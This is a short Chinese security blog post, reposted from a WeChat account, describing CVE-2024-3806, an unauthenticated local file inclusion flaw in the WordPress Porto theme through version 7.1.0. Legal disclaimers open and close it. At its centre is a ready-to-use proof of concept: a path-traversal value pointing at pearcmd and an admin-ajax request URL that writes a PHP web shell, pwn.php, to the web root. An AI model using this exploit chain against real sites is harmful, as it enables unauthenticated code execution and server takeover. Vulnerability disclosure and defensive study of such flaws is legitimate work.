免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
WordPress的Porto主题在7.1.0之前(包括7.1.0)的所有版本中都容易通过“Porto_ajax_posts”功能被本地文件包含。这使得未经身份验证的攻击者有可能在服务器上包含并执行任意文件,从而允许执行这些文件中的任何PHP代码。这可以用来绕过访问控制,获取敏感数据,或者在php文件类型可以上传和包含的情况下实现代码执行。
差异函数porto_ajax_posts文件:incfunctionspost.php
poc&exp
Steps to Reproduce:
Create post with slideshow_type value: ../../../../../../../../../usr/local/lib/php/pearcmd
Send Request
No login required to access: <Host>/wp-admin/admin-ajax.php?action=porto_ajax_posts&post_type=post&post_layout=full&+config-create+/&/<?=`$_GET[0]`?>+/var/www/html/pwn.php
or
No login required to access: <Host>/wp-admin/admin-ajax.php?action=porto_ajax_posts&post_type=post&post_layout=full&+config-create+/&/<?=`$_GET[0]`?>+/var/www/html/pwn.php&nonce={{porto_nonce}}
原文始发于微信公众号(漏洞猎人):CVE-2024-3806
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论